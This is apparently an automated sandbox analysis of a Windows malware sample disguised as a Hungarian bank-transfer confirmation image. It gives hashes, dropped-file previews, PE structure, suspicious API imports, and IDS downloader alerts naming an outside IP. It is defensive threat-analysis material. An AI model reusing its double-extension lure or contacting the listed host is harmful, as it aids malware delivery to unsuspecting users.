                                                                                                        MD5:6A8A4D5A13CC6665E475C45B39BB4248
                                                                                                        SHA1:C1301E2258DBB2383E187F40B2E712CCFD9B2671
                                                                                                        SHA-256:621BFBF2D0898CA2C1F9138DEAF1C282FAFB280ED439F05DBB419C2A3C22FE3B
                                                                                                        SHA-512:F458A17E7F54D04853406F961391BE48DC7AA616C09AAE7D4DF8C1AD27AFB8E23AD9D47360053650D14218E6DEB873F1B52A686B7E2AB55A0CF639AF5A080442
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:EA06.....F..i..mW.L...g".M.Vf.Z.>m9.....2g7..j..y....}`.2.E..iXy.r..^....z.2.I....Z...z..ko.W,4I..'>.D.q...iX..,3...$....w.t..5s..#WH...2..B./.Ivt...H.L;....y4..s;5.+...{.V}$....-.m*.Q....~.).I..........@...F.7..)sjo.m.......R.....]V.L........9$..'...L\.....aW...`..../.cL.Nh.j...U.Lf..mR.'..k..M..3..B..a..~c7....Z.?.5...}.<5B.H.i....j.3.....@.t.`4_m.[R..@.....1.M2.Y...|7.mRs...e.*..m...9.F.:.L;....)Y..m.6@.&|...->.Y..&...._.w..q.\.4..2....i[..i....h...@i.k..........zW;...8.....f.Q..j<.~eB....:..QO...s?.w.....8.....f..j...7.ceU8..}O.M(3j.j..s9...lq/Q.,./......?.;Y.x....?.5....zV.V..k<.V..9..'>...#o........A.rx...W2..>sL..WY..g......inu...k^..+_......Lc.y..k......v.4.Z?tY.o-.....g_k;..mri.".s.O:X..B=...;..l.wA.am<.:/.._.=......!.o}..(.s..j..q..93o........;.Z.u4{...O..6Y.Q.]..X....#o.M....N. .J)....k..v.:.c...r.3z.7.,.L.Uz..z.....R.V.....u....\.39.3.s..w...F.[.M..I.N......oWI7.Pi...EX.T@9.D>!..|.8:\.....v.......&&....H..;.C\.aQ.T.Q..E8v......
                                                                                                        Process:C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14896
                                                                                                        Entropy (8bit):7.597809237481346
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:k9/R/XVLeewD9Ktwu5D4DERrx+82K/cS+iswgceUs1vjkr:kR/XReeSByrcP8casD9vjkr
                                                                                                        MD5:5DCA920ADECFF2C4AC2DED9ABFA7C983
                                                                                                        SHA1:97B69DE5C71FF3E822942A31DAD228401FCF67E9
                                                                                                        SHA-256:B84CF92A956BD938A180BF012EA9C0534B41DC338250FCCDFC7A565BD0ABD8C8
                                                                                                        SHA-512:8FE36E07D6FB2D6CF0074A78F7D3FDE6305B2309FC7FE9611D6266E79D2CC29BFA6E19E75C3544AF3E349B8444E70089F4B4E2781D716883891F4E3D798F66EA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:EA06......3........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                                                                                        Process:C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208384
                                                                                                        Entropy (8bit):7.832987326805856
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:GJGmERrCTp70zDDd5ayF2UgnSdGoVSCvc:VdRWOFmnSdGoV70
                                                                                                        MD5:DD9CFD453BDD8944AE5EC2195F3F8EC7
                                                                                                        SHA1:4E556E7A655EF00B8F0A38A5981EB0E1EC96EDC8
                                                                                                        SHA-256:9A7D7D8763B6438D1A4610003F79C0C374164BBF8CCEDACADB1D02287F94AAD1
                                                                                                        SHA-512:DEC97C16ACF92CFB99EA2DE4EA3B61EA50E9017DC9BD873738CCEE2785FB94EF6FAFA10C366F2F3B19E26D16C45CB64A081BF5EB4AD5B61651F5668CBEC1FAB7
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:...6:A6W^3WJ..QM.Y7UAO69.6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO.9A6YE.YJ.>.l.X{.`.^P2.'(\08RZq.57Y:5oT\aD"4.>$.s..t4X1$a;4K.WZ3WJ379].t.$.1.H.H{+.)x.H/r%.I^..H.0.)vB.4oF.3fzY+]>.Gs.>$.&.M.r6*tF.?._Z).&.MWJ37QMTY7UAO69A6..1J37Q..Y7.@K6M.6.Z3WJ37QM.Y.TJN?9A.VZ3.K37QMTv.UAO&9A6.[3WJs7Q]TY7WAO39A6WZ3WO37QMTY7U1L69E6W..UJ17Q.TY'UA_69A6GZ3GJ37QMTI7UAO69A6WZ3._17.MTY75CO.5@6WZ3WJ37QMTY7UAO69A6WZ3WJ.PMHY7UAO69A6WZ3WJ37QMTY7UAO69A.ZX3.J37QMTY7UAO6.@6.[3WJ37QMTY7UAO69A6WZ3WJ37QMz-R-5O69Y.VZ3GJ37.LTY3UAO69A6WZ3WJ37qMT9.'%.BXA6.73WJ.6QM:Y7U.N69A6WZ3WJ37QM.Y7.o+WM 6WZ.gJ37qOTY!UAO<;A6WZ3WJ37QMTYwUA..K2D4Z3W.?6QM4[7UON69a4WZ3WJ37QMTY7U.O6yA6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ37QMTY7UAO69A6WZ3WJ
                                                                                                        Process:C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):172054
                                                                                                        Entropy (8bit):2.581428502649262
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:oUjxaM/0OCHqz+Q/muxDkrWRyBcyedHnCvd50m28kz8/Wczk4ANcrWpSFIO8TIfj:m
                                                                                                        MD5:DAA3D0359A9600292296B4DF206D5174
                                                                                                        SHA1:6E60A7CBE6DD132A8C310EDA45CFA303E4ADE184
                                                                                                        SHA-256:3FD863890309A873F70A47BD443C4B0C94A502D6B074DEA85049D794D0608709
                                                                                                        SHA-512:C7B28096F35A435BC877EF608EA9DC13E13CA963668AD10A7D7F80DCC24170C86A62673DA8319686C3CA6234A875D9F6D36D3270996A188DEEB3955C83C73F3E
                                                                                                        Malicious:false
                                                                                                        Preview:52110052110x52110552110552110852110b52110e52110c52110852110152110e52110c52110c52110c52110052110252110052110052110052110052110552110652110552110752110b52110852110652110b52110052110052110052110052110052110052110652110652110852110952110452110552110852110452110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110652110b52110a52110752110252110052110052110052110052110052110052110652110652110852110952110552110552110852110852110b52110852110652110e52110052110052110052110052110052110052110652110652110852110952110452110552110852110a52110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110c52110b52110a52110652110c52110052110052110052110052110052110052110652110652110852110952110552110552110852110e52110b52110852110352110352110052110052110052110052110052110052110652110652110852110952110452110552110952110052110b52110952110352110252110052110052110052110052110052110052110652110652110852110952110452110d5211
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.091043531849322
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        File size:882'009 bytes
                                                                                                        MD5:b036012ff35a5f3738dcd36e5e9d55b1
                                                                                                        SHA1:560db191d96f9559c11f8cd8c5bdbe7722c75aa8
                                                                                                        SHA256:f77786d716bdf01be933a41a2315e1db3d671e99cc7f2bcae148869becd52fe0
                                                                                                        SHA512:35f5e6d80cb37ebe4a4de803510ce4d33bb4eddb89e5f4d7e0cdb5811f4b644a1ae1f8ba63ea357f2c6dcc19dbd74428c0834b1982ca40a3a2046e8564600e47
                                                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCc9OU7VuuYxFMU2SL:7JZoQrbTFZY1iaCcYYKFM2L
                                                                                                        TLSH:6315C021F5C69036C2B323B19E7EF76A963D79361336D29B27C82D311EA05416B29733
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                        Icon Hash:1733312925935517
                                                                                                        Entrypoint:0x4165c1
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                        Instruction
                                                                                                        call 00007F38A87E6BDBh
                                                                                                        jmp 00007F38A87DDA4Eh
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                                        mov eax, ecx
                                                                                                        mov edx, ecx
                                                                                                        add eax, esi
                                                                                                        cmp edi, esi
                                                                                                        jbe 00007F38A87DDBCAh
                                                                                                        cmp edi, eax
                                                                                                        jc 00007F38A87DDD66h
                                                                                                        cmp ecx, 00000080h
                                                                                                        jc 00007F38A87DDBDEh
                                                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                                                        je 00007F38A87DDBD5h
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        and edi, 0Fh
                                                                                                        and esi, 0Fh
                                                                                                        cmp edi, esi
                                                                                                        pop esi
                                                                                                        pop edi
                                                                                                        jne 00007F38A87DDBC7h
                                                                                                        jmp 00007F38A87DDFA2h
                                                                                                        test edi, 00000003h
                                                                                                        jne 00007F38A87DDBD6h
                                                                                                        shr ecx, 02h
                                                                                                        and edx, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F38A87DDBEBh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00416740h+edx*4]
                                                                                                        mov eax, edi
                                                                                                        mov edx, 00000003h
                                                                                                        sub ecx, 04h
                                                                                                        jc 00007F38A87DDBCEh
                                                                                                        and eax, 03h
                                                                                                        add ecx, eax
                                                                                                        jmp dword ptr [00416654h+eax*4]
                                                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                                                        nop
                                                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                                                        nop
                                                                                                        inc cx
                                                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                        inc cx
                                                                                                        add byte ptr [ebx], ah
                                                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                                                        inc esi
                                                                                                        add dword ptr [eax+468A0147h], ecx
                                                                                                        add al, cl
                                                                                                        jmp 00007F38AAC563C7h
                                                                                                        add esi, 03h
                                                                                                        add edi, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F38A87DDB8Eh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00000000h+edx*4]
                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                        • [C++] VS2010 SP1 build 40219
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ASM] VS2010 SP1 build 40219
                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                        • [LNK] VS2010 SP1 build 40219
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                        DLLImport
                                                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishGreat Britain
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-11-18T13:25:54.903955+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649711158.101.44.24280TCP
                                                                                                        2024-11-18T13:25:56.544640+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649711158.101.44.24280TCP
